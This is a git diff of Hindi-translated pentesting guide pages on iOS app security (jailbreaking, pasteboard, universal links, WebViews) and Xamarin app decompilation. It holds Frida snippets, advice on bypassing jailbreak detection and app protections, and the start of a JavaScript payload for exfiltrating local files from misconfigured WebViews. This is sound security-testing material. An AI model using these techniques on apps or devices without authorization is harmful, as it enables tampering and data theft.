xcrun simctl list | grep Booted
iPhone 8 (BF5DA4F8-6BBE-4EA0-BA16-7E3AFD16C06C) (Booted)
```
एक बार जब आप UID जान लेते हैं, तो इसके भीतर स्थापित ऐप्स को `/Users/<username>/Library/Developer/CoreSimulator/Devices/{UID}/data/Containers/Data/Application` में पाया जा सकता है।
हालांकि, आश्चर्यजनक रूप से आप यहां एप्लिकेशन नहीं पाएंगे। आपको `/Users/<username>/Library/Developer/Xcode/DerivedData/{Application}/Build/Products/Debug-iphonesimulator/` में पहुंचना होगा
हालांकि, आश्चर्यजनक रूप से, आप यहां एप्लिकेशन नहीं पाएंगे। आपको `/Users/<username>/Library/Developer/Xcode/DerivedData/{Application}/Build/Products/Debug-iphonesimulator/` तक पहुंचने की आवश्यकता है
और इस फ़ोल्डर में आप **एप्लिकेशन का पैकेज ढूंढ सकते हैं।**
@ -58,22 +58,22 @@ Corellium एकमात्र सार्वजनिक रूप से उ
## जेलब्रेकिंग
Apple सख्ती से आवश्यक करता है कि iPhone पर चलने वाला कोड **Apple द्वारा जारी किए गए प्रमाणपत्र से हस्ताक्षरित होना चाहिए**। **जेलब्रेकिंग** उस प्रक्रिया को कहते हैं जिसमें सक्रिय रूप से **ऐसी सीमाओं** और OS द्वारा लगाए गए अन्य सुरक्षा नियंत्रणों को **बायपास** किया जाता है। इसलिए, एक बार जब डिवाइस जेलब्रेक हो जाता है, तो **इंटीग्रिटी चेक** जो ऐप्स के इंस्टॉल होने की जांच करता है, पैच किया जाता है ताकि इसे **बायपास** किया जा सके।
Apple सख्ती से आवश्यक करता है कि iPhone पर चलने वाला कोड **Apple द्वारा जारी किए गए प्रमाणपत्र द्वारा हस्ताक्षरित होना चाहिए**। **जेलब्रेकिंग** उस प्रक्रिया को कहते हैं जिसमें सक्रिय रूप से **ऐसी प्रतिबंधों** और OS द्वारा लगाए गए अन्य सुरक्षा नियंत्रणों को **बायपास** किया जाता है। इसलिए, एक बार जब डिवाइस जेलब्रेक हो जाता है, तो **अखंडता जांच** जो स्थापित ऐप्स की जांच के लिए जिम्मेदार होती है, पैच की जाती है ताकि इसे **बायपास** किया जा सके।
> [!NOTE]
> Android के विपरीत, **आप iOS में "डेवलपर मोड" में स्विच नहीं कर सकते** ताकि डिवाइस पर असाइन किए गए/अविश्वसनीय कोड चल सके।
### Android रूटिंग बनाम iOS जेलब्रेकिंग
हालांकि अक्सर इसकी तुलना की जाती है, **Android पर रूटिंग** और **iOS पर जेलब्रेकिंग** मौलिक रूप से अलग प्रक्रियाए हैं। Android उपकरणों पर रूटिंग में **`su` बाइनरी** स्थापित करना या **रूटेड कस्टम ROM के साथ सिस्टम को बदलना** शामिल हो सकता है, जिस लिए अनलॉक किए गए बूटलोडर की आवश्यकता नहीं होती है। **कस्टम ROM को फ्लैश करना** बूटलोडर को अनलॉक करने के बाद डिवाइस के OS को बदलता है, कभी-कभी एक एक्सप्लॉइट की आवश्यकता होती है।
हालांकि अक्सर इसकी तुलना की जाती है, **Android पर रूटिंग** और **iOS पर जेलब्रेकिंग** मौलिक रूप से अलग प्रक्रियाए हैं। Android उपकरणों पर रूटिंग में **`su` बाइनरी** स्थापित करना या **रूटेड कस्टम ROM के साथ सिस्टम को बदलना** शामिल हो सकता है, जिसे अनलॉक किए गए बूटलोडर के साथ आवश्यक रूप से शोषण की आवश्यकता नहीं होती है। **कस्टम ROM को फ्लैश करना** बूटलोडर को अनलॉक करने के बाद डिवाइस के OS को बदलता है, कभी-कभी शोषण की आवश्यकता होती है।
इसके विपरीत, iOS उपकरण कस्टम ROM को फ्लैश नहीं कर सकते क्योंकि बूटलोडर केवल Apple द्वारा हस्ताक्षरित छवियों को बूट करने की अनुमति देता है। **iOS को जेलब्रेक करना** Apple के कोड साइनिंग सुरक्षा को बायपास करने का लक्ष्य रखता है ताकि असाइन किए गए कोड को चलाया जा सके, यह प्रक्रिया Apple के निरंतर सुरक्षा सुधारों द्वारा जटिल होती है।
इसके विपरीत, iOS उपकरण कस्टम ROM को फ्लैश नहीं कर सकते हैं क्योंकि बूटलोडर केवल Apple द्वारा हस्ताक्षरित छवियों को बूट करने की अनुमति देता है। **iOS को जेलब्रेक करना** Apple के कोड साइनिंग सुरक्षा को बायपास करने का लक्ष्य रखता है ताकि असाइन किए गए कोड को चलाया जा सके, यह प्रक्रिया Apple के निरंतर सुरक्षा सुधारों द्वारा जटिल होती है।
### जेलब्रेकिंग चुनौतियाँ
iOS को जेलब्रेक करना तेजी से कठिन होता जा रहा है क्योंकि Apple जल्दी से कमजोरियों को पैच करता है। **iOS को डाउनग्रेड करना** केवल एक रिलीज के बाद सीमित समय के लिए संभव है, जिससे जेलब्रेकिंग एक समय-संवेदनशील मामला बन जाता है। सुरक्षा परीक्षण के लिए उपयोग किए जाने वाले उपकरणों को अपडेट नहीं किया जाना चाहिए जब तक कि फिर से जेलब्रेकिंग की गारंटी न हो।
iOS अपडेट एक **चुनौती-प्रतिक्रिया तंत्र** (SHSH ब्लॉब) द्वारा नियंत्रित होते हैं, जो केवल Apple द्वारा हस्ताक्षरित प्रतिक्रियाओं के लिए इंस्टॉलेशन की अनुमति देता है। इस तंत्र को "साइनिंग विंडो" के रूप में जाना जाता है, जो OTA फर्मवेयर पैकेज को स्टोर करने और बाद में उपयोग करने की क्षमता को सीमित करता है। [IPSW Downloads वेबसाइट](https://ipsw.me) वर्तमान साइनिंग विंडो की जांच करने के लिए एक संसाधन है।
iOS अपडेट एक **चुनौती-प्रतिक्रिया तंत्र** (SHSH ब्लॉब) द्वारा नियंत्रित होते हैं, जो केवल Apple द्वारा हस्ताक्षरित प्रतिक्रियाओं के लिए स्थापना की अनुमति देता है। इस तंत्र को "साइनिंग विंडो" के रूप में जाना जाता है, जो OTA फर्मवेयर पैकेज को स्टोर करने और बाद में उपयोग करने की क्षमता को सीमित करता है। [IPSW Downloads वेबसाइट](https://ipsw.me) वर्तमान साइनिंग विंडो की जांच करने के लिए एक संसाधन है।
### जेलब्रेक की विविधताएँ
@ -84,17 +84,17 @@ iOS अपडेट एक **चुनौती-प्रतिक्रिय
### जेलब्रेकिंग उपकरण और संसाधन
जेलब्रेकिंग उपकरण iOS संस्करण और डिवाइस के अनुसार भिन्न होते हैं। संसाधन जैसे [Can I Jailbreak?](https://canijailbreak.com), [The iPhone Wiki](https://www.theiphonewiki.com), और [Reddit Jailbreak](https://www.reddit.com/r/jailbreak/) अद्यतन जानकारी प्रदान करते हैं। उदाहरणों में शामिल हैं:
जेलब्रेकिंग उपकरण iOS संस्करण और डिवाइस के अनुसार भिन्न होते हैं। [Can I Jailbreak?](https://canijailbreak.com), [The iPhone Wiki](https://www.theiphonewiki.com), और [Reddit Jailbreak](https://www.reddit.com/r/jailbreak/) जैसे संसाधन अद्यतन जानकारी प्रदान करते हैं। उदाहरणों में शामिल हैं:
- [Checkra1n](https://checkra.in/) A7-A11 चिप उपकरणों के लिए।
- [Palera1n](https://palera.in/) Checkm8 उपकरणों (A8-A11) के लिए iOS 15.0-16.5 पर।
- [Unc0ver](https://unc0ver.dev/) iOS संस्करण 14.8 तक के लिए
- [Unc0ver](https://unc0ver.dev/) iOS संस्करणों के लिए 14.8 तक।
अपने उपकरण को संशोधित करने में जोखिम होता है, और जेलब्रेकिंग को सावधानी से किया जाना चाहिए।
अपने डिवाइस को संशोधित करना जोखिम उठाता है, और जेलब्रेकिंग को सावधानी के साथ किया जाना चाहिए।
### जेलब्रेकिंग के लाभ और जोखिम
जेलब्रेकिंग **OS द्वारा लगाए गए सैंडबॉक्सिंग को हटा देती है**, जिससे ऐप्स को पूरे फाइल सिस्टम तक पहुंच मिलती है। यह स्वतंत्रता अस्वीकृत ऐप्स को स्थापित करने और अधिक APIs तक पहुंचने की अनुमति देती है। हालांकि, नियमित उपयोगकर्ताओं के लिए, जेलब्रेकिंग **सिफारिश नहीं की जाती** है क्योंकि इससे संभावित सुरक्षा जोखिम और उपकरण की अस्थिरता हो सकती है।
जेलब्रेकिंग **OS द्वारा लगाए गए सैंडबॉक्सिंग को हटा देती है**, जिससे ऐप्स को पूरे फाइल सिस्टम तक पहुंच मिलती है। यह स्वतंत्रता अस्वीकृत ऐप्स को स्थापित करने और अधिक API तक पहुंचने की अनुमति देती है। हालांकि, नियमित उपयोगकर्ताओं के लिए, जेलब्रेकिंग **अनुशंसित नहीं है** क्योंकि इससे संभावित सुरक्षा जोखिम और डिवाइस की अस्थिरता हो सकती है।
### **जेलब्रेकिंग के बाद**
@ -110,9 +110,9 @@ basic-ios-testing-operations.md
- एक जेलब्रेक किए गए डिवाइस में एप्लिकेशन को **नए फ़ाइलों** तक **पढ़ने/लिखने की पहुंच** मिलती है जो सैंडबॉक्स के बाहर होती हैं।
- कुछ **API** **कॉल** **अलग तरीके से व्यवहार करेंगी।**
- **OpenSSH** सेवा की उपस्थिति।
- `/bin/sh` को कॉल करने पर **1** लौटाएगा बजाय 0 के
- `/bin/sh` को कॉल करने पर **1** लौटाएगा, 0 के बजाय।
**जेलब्रेकिंग का पता लगाने के तरीके के बारे में अधिक जानकारी** [**यहां**](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/jailbreak-detection-methods/)**।**
**जेलब्रेकिंग का पता लगाने के बारे में अधिक जानकारी** [**यहां**](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/jailbreak-detection-methods/)**।**
आप **objection's** `ios jailbreak disable` का उपयोग करके इन डिटेक्शनों से बचने की कोशिश कर सकते हैं।

12
src/mobile-pentesting/ios-pentesting/ios-uiactivity-sharing.md
View File

@ -16,7 +16,7 @@ iOS 6 से, तृतीय-पक्ष अनुप्रयोगों क
- कस्टम गतिविधियों का समावेश।
- कुछ गतिविधि प्रकारों का बहिष्कार।
साझा करना `UIActivityViewController` के निर्माण के माध्यम से सुगम बनाया गया है, जिसमें साझा करने के लिए इच्छित वस्तुओं को पास किया जाता है। यह निम्नलिखित द्वारा प्राप्त किया जाता है:
साझा करने की प्रक्रिय`UIActivityViewController` के निर्माण के माध्यम से की जाती है, जिसमें साझा करने के लिए इच्छित वस्तुओं को पास किया जाता है। यह निम्नलिखित द्वारा प्राप्त किया जाता है:
```bash
$ rabin2 -zq Telegram\ X.app/Telegram\ X | grep -i activityItems
0x1000df034 45 44 initWithActivityItems:applicationActivities:
@ -31,16 +31,16 @@ $ rabin2 -zq Telegram\ X.app/Telegram\ X | grep -i activityItems
- **दस्तावेज़ प्रकारों** का निर्दिष्ट करना जिन्हें ऐप खोल सकता है।
- **प्राप्त डेटा की अखंडता** की पुष्टि करना।
स्रोत कोड तक पहुंच के बिना, कोई भी `Info.plist` में `UTExportedTypeDeclarations`, `UTImportedTypeDeclarations`, और `CFBundleDocumentTypes` जैसे कुंजियों की जांच कर सकता है ताकि यह समझ सके कि एक ऐप किन दस्तावेज़ प्रकारों को संभाल और घोषित कर सकता है।
स्रोत कोड तक पहुंच के बिना, कोई `Info.plist` में `UTExportedTypeDeclarations`, `UTImportedTypeDeclarations`, और `CFBundleDocumentTypes` जैसे कुंजियों की जांच कर सकता है ताकि यह समझ सके कि एक ऐप किन दस्तावेज़ प्रकारों को संभाल और घोषित कर सकता है।
इन कुंजियों पर एक संक्षिप्त मार्गदर्शिका [Stackoverflow](https://stackoverflow.com/questions/21937978/what-are-utimportedtypedeclarations-and-utexportedtypedeclarations-used-for-on-i) पर उपलब्ध है, जो सिस्टम-व्यापी पहचान के लिए UTIs को परिभाषित और आयात करने के महत्व को उजागर करती है और आपके ऐप के साथ दस्तावेज़ प्रकारों को "Open With" संवाद में एकीकृत करने के लिए जोड़ती है।
इन कुंजियों पर एक संक्षिप्त मार्गदर्शिका [Stackoverflow](https://stackoverflow.com/questions/21937978/what-are-utimportedtypedeclarations-and-utexportedtypedeclarations-used-for-on-i) पर उपलब्ध है, जो सिस्टम-व्यापी पहचान के लिए UTIs को परिभाषित और आयात करने के महत्व को उजागर करती है और "Open With" संवाद में एकीकृत करने के लिए आपके ऐप के साथ दस्तावेज़ प्रकारों को जोड़ती है।
## डायनामिक परीक्षण दृष्टिकोण
**गतिविधियों को भेजने** के लिए, कोई कर सकता है:
**गतिविधियों को भेजने** का परीक्षण करने के लिए, कोई:
- साझा की जा रही वस्तुओं और गतिविधियों को कैप्चर करने के लिए `init(activityItems:applicationActivities:)` विधि में हुक करें
- `excludedActivityTypes` प्रॉपर्टी को इंटरसेप्ट करके बाहर की गई गतिविधियों की पहचान करें
- साझा की जा रही वस्तुओं और गतिविधियों को कैप्चर करने के लिए `init(activityItems:applicationActivities:)` विधि में हुक कर सकता है
- `excludedActivityTypes` प्रॉपर्टी को इंटरसेप्ट करके बाहर की गई गतिविधियों की पहचान कर सकता है
**वस्तुओं को प्राप्त करने** के लिए, इसमें शामिल है:

12
src/mobile-pentesting/ios-pentesting/ios-uipasteboard.md
View File

@ -1,18 +1,18 @@
{{#include ../../banners/hacktricks-training.md}}
iOS उपकरणों पर अनुप्रयोगों के भीतर और पार डेटा साझा करने की प्रक्रिया [`UIPasteboard`](https://developer.apple.com/documentation/uikit/uipasteboard) तंत्र द्वारा की जाती है, जिसे दो मुख्य श्रेणियों में विभाजित किया गया है:
iOS उपकरणों पर अनुप्रयोगों के भीतर और उनके बीच डेटा साझा करने की प्रक्रिया [`UIPasteboard`](https://developer.apple.com/documentation/uikit/uipasteboard) तंत्र द्वारा की जाती है, जिसे दो मुख्य श्रेणियों में विभाजित किया गया है:
- **सिस्टमव्यापी सामान्य पेस्टबोर्ड**: इसका उपयोग **किसी भी अनुप्रयोग** के साथ डेटा साझा करने के लिए किया जाता है और इसे डिवाइस पुनरारंभ और ऐप अनइंस्टॉलेशन के बीच डेटा बनाए रखने के लिए डिज़ाइन किया गया है, यह सुविधा iOS 10 से उपलब्ध है।
- **कस्टम / नामित पेस्टबोर्ड**: ये विशेष रूप से **एक ऐप के भीतर या किसी अन्य ऐप के साथ** डेटा साझा करने के लिए होते हैं जो समान टीम आईडी साझा करते हैं, और इन्हें उन अनुप्रयोग प्रक्रिया के जीवन से परे बनाए रखने के लिए डिज़ाइन नहीं किया गया है जो इन्हें बनाते हैं, जो iOS 10 में पेश किए गए परिवर्तनों का पालन करते हैं
- **सिस्टमव्यापी सामान्य पेस्टबोर्ड**: इसका उपयोग **किसी भी अनुप्रयोग** के साथ डेटा साझा करने के लिए किया जाता है और इसे डिवाइस पुनरारंभ और ऐप अनइंस्टॉलेशन के दौरान डेटा को बनाए रखने के लिए डिज़ाइन किया गया है, यह सुविधा iOS 10 से उपलब्ध है।
- **कस्टम / नामित पेस्टबोर्ड**: ये विशेष रूप से **एक ऐप के भीतर या किसी अन्य ऐप के साथ** डेटा साझा करने के लिए होते हैं जो समान टीम आईडी साझा करते हैं, और इन्हें उन अनुप्रयोग प्रक्रियाओं के जीवन से परे बनाए रखने के लिए डिज़ाइन नहीं किया गया है, जो इन्हें बनाती हैं, iOS 10 में पेश किए गए परिवर्तनों के अनुसार
**सुरक्षा विचार** पेस्टबोर्ड का उपयोग करते समय महत्वपूर्ण भूमिका निभाते हैं। उदाहरण के लिए:
- उपयोगकर्ताओं के लिए **पेस्टबोर्ड** तक पहुंच के लिए ऐप अनुमतियों को प्रबंधित करने का कोई तंत्र नहीं है।
- पेस्टबोर्ड की अनधिकृत पृष्ठभूमि निगरानी के जोखिम को कम करने के लिए, पहुच को तब तक सीमित किया गया है जब तक अनुप्रयोग अग्रभूमि में न हो (iOS 9 से)।
- उपयोगकर्ताओं के लिए **पेस्टबोर्ड** तक पहुँचने के लिए ऐप अनुमतियों को प्रबंधित करने का कोई तंत्र नहीं है।
- पेस्टबोर्ड की अनधिकृत पृष्ठभूमि निगरानी के जोखिम को कम करने के लिए, पहुच को तब तक सीमित किया गया है जब तक अनुप्रयोग अग्रभूमि में है (iOS 9 से)।
- गोपनीयता चिंताओं के कारण साझा कंटेनरों के पक्ष में स्थायी नामित पेस्टबोर्ड के उपयोग की सिफारिश नहीं की जाती है।
- iOS 10 के साथ पेश की गई **यूनिवर्सल क्लिपबोर्ड** सुविधा, जो सामान्य पेस्टबोर्ड के माध्यम से उपकरणों के बीच सामग्री साझा करने की अनुमति देती है, डेटा समाप्ति सेट करने और स्वचालित सामग्री स्थानांतरण को अक्षम करने के लिए डेवलपर्स द्वारा प्रबंधित की जा सकती है।
यह सुनिश्चित करना कि **संवेदनशील जानकारी अनजाने में** वैश्विक पेस्टबोर्ड पर संग्रहीत नहीं हो, महत्वपूर्ण है। इसके अतिरिक्त, अनुप्रयोगों को इस तरह से डिज़ाइन किया जाना चाहिए कि वैश्विक पेस्टबोर्ड डेटा का दुरुपयोग अनपेक्षित क्रियाओं के लिए न हो, और डेवलपर्स को संवेदनशील जानकारी को क्लिपबोर्ड पर कॉपी करने से रोकने के लिए उपाय लागू करने के लिए प्रोत्साहित किया जाता है।
यह सुनिश्चित करना कि **संवेदनशील जानकारी अनजाने में** वैश्विक पेस्टबोर्ड पर संग्रहीत न हो, महत्वपूर्ण है। इसके अतिरिक्त, अनुप्रयोगों को इस तरह से डिज़ाइन किया जाना चाहिए कि वैश्विक पेस्टबोर्ड डेटा का दुरुपयोग अनपेक्षित क्रियाओं के लिए न हो, और डेवलपर्स को संवेदनशील जानकारी को क्लिपबोर्ड पर कॉपी करने से रोकने के लिए उपाय लागू करने के लिए प्रोत्साहित किया जाता है।
### स्थैतिक विश्लेषण

2
src/mobile-pentesting/ios-pentesting/ios-universal-links.md
View File

@ -24,7 +24,7 @@
### **Apple App Site Association फ़ाइल प्राप्त करना**
`apple-app-site-association` फ़ाइल को अधिकारों में निर्दिष्ट डोमेन का उपयोग करके सर्वर से प्राप्त किया जाना चाहिए। सुनिश्चित करें कि फ़ाइल HTTPS के माध्यम से सीधे `https://<domain>/apple-app-site-association` पर सुलभ है। [Apple App Site Association (AASA) Validator](https://branch.io/resources/aasa-validator/) जैसे उपकरण इस प्रक्रिया में मदद कर सकते हैं।
`apple-app-site-association` फ़ाइल को अधिकारों में निर्दिष्ट डोमेन का उपयोग करके सर्वर से प्राप्त किया जाना चाहिए। सुनिश्चित करें कि फ़ाइल `https://<domain>/apple-app-site-association` पर सीधे HTTPS के माध्यम से सुलभ है। [Apple App Site Association (AASA) Validator](https://branch.io/resources/aasa-validator/) जैसे उपकरण इस प्रक्रिया में मदद कर सकते हैं।
### **ऐप में यूनिवर्सल लिंक को संभालना**

16
src/mobile-pentesting/ios-pentesting/ios-webviews.md
View File

@ -10,7 +10,7 @@ WebViews का उपयोग अनुप्रयोगों के भी
- **UIWebView**, जिसे iOS 12 से आगे अनुशंसित नहीं किया गया है क्योंकि यह **JavaScript** को निष्क्रिय करने के लिए समर्थन की कमी के कारण स्क्रिप्ट इंजेक्शन और **Cross-Site Scripting (XSS)** हमलों के प्रति संवेदनशील है।
- **WKWebView** ऐप्स में वेब सामग्री को शामिल करने के लिए पसंदीदा विकल्प है, जो सामग्री और सुरक्षा सुविधाओं पर बेहतर नियंत्रण प्रदान करता है। **JavaScript** डिफ़ॉल्ट रूप से सक्षम है, लेकिन यदि आवश्यक हो तो इसे निष्क्रिय किया जा सकता है। यह स्वचालित रूप से विंडो खोलने से रोकने के लिए सुविधाएँ भी प्रदान करता है और सुनिश्चित करता है कि सभी सामग्री सुरक्षित रूप से लोड हो। इसके अतिरिक्त, **WKWebView** की आर्किटेक्चर मुख्य ऐप प्रक्रिया को प्रभावित करने वाले मेमोरी भ्रष्टाचार के जोखिम को कम करती है।
- **WKWebView** ऐप्स में वेब सामग्री को शामिल करने के लिए पसंदीदा विकल्प है, जो सामग्री और सुरक्षा सुविधाओं पर बेहतर नियंत्रण प्रदान करता है। **JavaScript** डिफ़ॉल्ट रूप से सक्षम है, लेकिन यदि आवश्यक हो तो इसे निष्क्रिय किया जा सकता है। यह स्वचालित रूप से विंडो खोलने से **JavaScript** को रोकने के लिए सुविधाएँ भी प्रदान करता है और सुनिश्चित करता है कि सभी सामग्री सुरक्षित रूप से लोड हो। इसके अतिरिक्त, **WKWebView** की वास्तुकला मुख्य ऐप प्रक्रिया को प्रभावित करने वाले मेमोरी भ्रष्टाचार के जोखिम को कम करती है।
- **SFSafariViewController** ऐप्स के भीतर एक मानकीकृत वेब ब्राउज़िंग अनुभव प्रदान करता है, जिसे एक पढ़ने योग्य पते के क्षेत्र, साझा करने और नेविगेशन बटन, और सामग्री को सफारी में खोलने के लिए एक सीधा लिंक सहित इसके विशिष्ट लेआउट द्वारा पहचाना जा सकता है। **WKWebView** के विपरीत, **SFSafariViewController** में **JavaScript** को निष्क्रिय नहीं किया जा सकता है, जो सफारी के साथ कुकीज़ और डेटा साझा करता है, ऐप से उपयोगकर्ता की गोपनीयता बनाए रखता है। इसे ऐप स्टोर दिशानिर्देशों के अनुसार प्रमुखता से प्रदर्शित किया जाना चाहिए।
```javascript
@ -129,9 +129,9 @@ WebViews में सामग्री को संभालना एक म
$ rabin2 -zz ./WheresMyBrowser | grep -i "loadHTMLString"
231 0x0002df6c 24 (4.__TEXT.__objc_methname) ascii loadHTMLString:baseURL:
```
**फाइल एक्सेस** के संबंध में, UIWebView इसे सार्वभौमिक रूप से अनुमति देता है, जबकि WKWebView फ़ाइल URL से एक्सेस प्रबंधन के लिए `allowFileAccessFromFileURLs` और `allowUniversalAccessFromFileURLs` सेटिंग्स पेश करता है, जिनमें से दोनों डिफ़ॉल्ट रूप से गलत हैं।
**फाइल एक्सेस** के संबंध में, UIWebView इसे सार्वभौमिक रूप से अनुमति देता है, जबकि WKWebView `allowFileAccessFromFileURLs` और `allowUniversalAccessFromFileURLs` सेटिंग्स को फाइल URL से एक्सेस प्रबंधित करने के लिए पेश करता है, जिनमें से दोनों डिफ़ॉल्ट रूप से गलत हैं।
सुरक्षा सेटिंग्स के लिए **WKWebView** कॉन्फ़िगरेशन की जांच करने के लिए एक Frida स्क्रिप्ट उदाहरण प्रदान किया गया है:
सुरक्षा सेटिंग्स के लिए **WKWebView** कॉन्फ़िगरेशन का निरीक्षण करने के लिए एक Frida स्क्रिप्ट उदाहरण प्रदान किया गया है:
```bash
ObjC.choose(ObjC.classes['WKWebView'], {
onMatch: function (wk) {
@ -149,7 +149,7 @@ console.log('done for WKWebView!');
}
});
```
अंत में, स्थानीय फ़ाइलों को निकालने के लिए लक्षित एक JavaScript पेलोड का उदाहरण अनुचित रूप से कॉन्फ़िगर किए गए WebViews से संबंधित संभावित सुरक्षा जोखिम को दर्शाता है। यह पेलोड फ़ाइल सामग्री को सर्वर पर भेजने से पहले हेक्स प्रारूप में एन्कोड करता है, जो WebView कार्यान्वयन में कठोर सुरक्षा उपायों के महत्व को उजागर करता है।
अंत में, स्थानीय फ़ाइलों को निकालने के लिए लक्षित एक JavaScript पेलोड का उदाहरण गलत तरीके से कॉन्फ़िगर किए गए WebViews से संबंधित संभावित सुरक्षा जोखिम को प्रदर्शित करता है। यह पेलोड फ़ाइल सामग्री को सर्वर पर भेजने से पहले हेक्स प्रारूप में एन्कोड करता है, जो WebView कार्यान्वयन में कठोर सुरक्षा उपायों के महत्व को उजागर करता है।
```javascript
String.prototype.hexEncode = function () {
var hex, i
@ -198,7 +198,7 @@ Objective-C में, `UIWebView` के लिए `JSContext` को निम
```
### Communication with `WKWebView`
`WKWebView` के लिए, `JSContext` तक सीधी पहुँच उपलब्ध नहीं है। इसके बजाय, संदेश पासिंग `postMessage` फ़ंक्शन के माध्यम से उपयोग की जाती है, जो JavaScript को मूल संचार की अनुमति देती है। इन संदेशों के लिए हैंडलर इस प्रकार सेट किए जाते हैं, जो JavaScript को सुरक्षित रूप से मूल एप्लिकेशन के साथ इंटरैक्ट करने की अनुमति देते हैं:
`WKWebView` के लिए, `JSContext` तक सीधी पहुँच उपलब्ध नहीं है। इसके बजाय, संदेश पासिंग का उपयोग `postMessage` फ़ंक्शन के माध्यम से किया जाता है, जो JavaScript को मूल संचार की अनुमति देता है। इन संदेशों के लिए हैंडलर इस प्रकार सेट किए जाते हैं, जो JavaScript को सुरक्षित रूप से मूल एप्लिकेशन के साथ इंटरैक्ट करने की अनुमति देते हैं:
```swift
func enableJavaScriptBridge(_ enabled: Bool) {
options_dict["javaScriptBridge"]?.value = enabled
@ -213,7 +213,7 @@ userContentController.add(javaScriptBridgeMessageHandler, name: "javaScriptBridg
```
### Interaction and Testing
JavaScript स्थानीय परत के साथ इंटरैक्ट करने के लिए एक स्क्रिप्ट संदेश हैंडलर को परिभाषित कर सकता है। यह एक वेबपेज से स्थानीय फ़ंक्शनों को कॉल करने जैसी क्रियाओं की अनुमति देता है:
JavaScript स्थानीय परत के साथ बातचीत करने के लिए एक स्क्रिप्ट संदेश हैंडलर को परिभाषित कर सकता है। यह एक वेबपेज से स्थानीय कार्यों को बुलाने जैसी क्रियाओं की अनुमति देता है:
```javascript
function invokeNativeOperation() {
value1 = document.getElementById("value1").value
@ -258,9 +258,9 @@ message.webView?.evaluateJavaScript(javaScriptCallBack, completionHandler: nil)
iOS webviews के भीतर वेब सामग्री को प्रभावी ढंग से डिबग करने के लिए, Safari के डेवलपर टूल्स की एक विशिष्ट सेटअप की आवश्यकता होती है क्योंकि `console.log()` को भेजे गए संदेश Xcode लॉग में प्रदर्शित नहीं होते हैं। यहाँ एक सरल गाइड है, जो प्रमुख चरणों और आवश्यकताओं पर जोर देती है:
- **iOS डिवाइस पर तैयारी**: आपके iOS डिवाइस पर Safari Web Inspector को सक्रिय करना आवश्यक है। यह **Settings > Safari > Advanced** में जाकर और _Web Inspector_ को सक्षम करके किया जाता है।
- **iOS डिवाइस पर तैयारी**: आपके iOS डिवाइस पर Safari Web Inspector को सक्रिय करना आवश्यक है। यह **Settings > Safari > Advanced** पर जाकर और _Web Inspector_ को सक्षम करके किया जाता है।
- **macOS डिवाइस पर तैयारी**: आपके macOS विकास मशीन पर, Safari के भीतर डेवलपर टूल्स को सक्षम करना होगा। Safari लॉन्च करें, **Safari > Preferences > Advanced** पर जाएं, और _Show Develop menu_ विकल्प का चयन करें।
- **macOS डिवाइस पर तैयारी**: आपके macOS विकास मशीन पर, आपको Safari के भीतर डेवलपर टूल्स को सक्षम करना होगा। Safari लॉन्च करें, **Safari > Preferences > Advanced** पर जाएं, और _Show Develop menu_ विकल्प का चयन करें।
- **कनेक्शन और डिबगिंग**: अपने iOS डिवाइस को अपने macOS कंप्यूटर से कनेक्ट करने और अपने एप्लिकेशन को लॉन्च करने के बाद, अपने macOS डिवाइस पर Safari का उपयोग करके उस वेबव्यू का चयन करें जिसे आप डिबग करना चाहते हैं। Safari के मेनू बार में _Develop_ पर जाएं, अपने iOS डिवाइस के नाम पर होवर करें ताकि वेबव्यू उदाहरणों की सूची दिखाई दे, और उस उदाहरण का चयन करें जिसे आप निरीक्षण करना चाहते हैं। इस उद्देश्य के लिए एक नया Safari Web Inspector विंडो खुलेगा।

8
src/mobile-pentesting/xamarin-apps.md
View File

@ -33,15 +33,15 @@ APK/IPA में असेंबली तक पहुंचने के ल
python3 xamarin-decompress.py -o /path/to/decompressed/apk
```
ऐसे मामलों में जहां APK को डिकंपाइल करने के बाद अज्ञात/assemblies/ फ़ोल्डर में `.dll` फ़ाइलें देखी जा सकती हैं, इसलिए `.dlls` पर सीधे विश्लेषण करने के लिए [**dnSpy**](https://github.com/dnSpy/dnSpy) का उपयोग करना संभव है।\
हालांकि, कभी-कभी, अज्ञात/assemblies/ फ़ोल्डर के अंदर `assemblies.blob` और `assemblies.manifest` फ़ाइलें पाई जाती हैं। Xamarin ऐप्स में `assemblies.blob` फ़ाइल को अनपैक करने के लिए उपकरण [pyxamstore](https://github.com/jakev/pyxamstore) का उपयोग किया जा सकता है, जो आगे के विश्लेषण के लिए .NET assemblies तक पहुंच प्रदान करता है:
हालांकि, कभी-कभी, अज्ञात/assemblies/ फ़ोल्डर के अंदर `assemblies.blob` और `assemblies.manifest` फ़ाइलें पाई जाती हैं। Xamarin ऐप्स में `assemblies.blob` फ़ाइल को अनपैक करने के लिए उपकरण [pyxamstore](https://github.com/jakev/pyxamstore) का उपयोग किया जा सकता है, जो आगे के विश्लेषण के लिए .NET assemblies तक पहुंच की अनुमति देता है:
```bash
pyxamstore unpack -d /path/to/decompressed/apk/assemblies/
```
iOS dll फ़ाइलें डिकंपाइल के लिए आसानी से उपलब्ध हैं, जो एप्लिकेशन कोड के महत्वपूर्ण हिस्सों को प्रकट करती हैं, जो अक्सर विभिन्न प्लेटफार्मों में एक सामान्य आधार साझा करती हैं।
iOS dll फ़ाइलें डिकंपाइल के लिए आसानी से उपलब्ध हैं, जो एप्लिकेशन कोड के महत्वपूर्ण हिस्सों को प्रकट करती हैं, जो अक्सर विभिन्न प्लेटफार्मों के बीच एक सामान्य आधार साझा करती हैं।
### स्थैतिक विश्लेषण
एक बार जब `.dll`s प्राप्त हो जाती हैं, तो .Net कोड का स्थैतिक विश्लेषण करना संभव है, जैसे कि [**dnSpy**](https://github.com/dnSpy/dnSpy) **या** [**ILSpy**](https://github.com/icsharpcode/ILSpy) **जो** ऐप के कोड को संशोधित करने की अनुमति देगा। यह एप्लिकेशन को सुरक्षा को बायपास करने के लिए छेड़छाड़ करने के लिए बहुत उपयोगी हो सकता है।\
एक बार जब `.dll` प्राप्त हो जाती हैं, तो .Net कोड का स्थैतिक विश्लेषण करना संभव है, जैसे कि [**dnSpy**](https://github.com/dnSpy/dnSpy) **या** [**ILSpy**](https://github.com/icsharpcode/ILSpy) **जो** ऐप के कोड को संशोधित करने की अनुमति देगा। यह एप्लिकेशन को संशोधित करने के लिए बहुत उपयोगी हो सकता है ताकि सुरक्षा को बायपास किया जा सके।\
ध्यान दें कि ऐप को संशोधित करने के बाद, आपको इसे फिर से पैक करना होगा और फिर से साइन करना होगा।
### गतिशील विश्लेषण
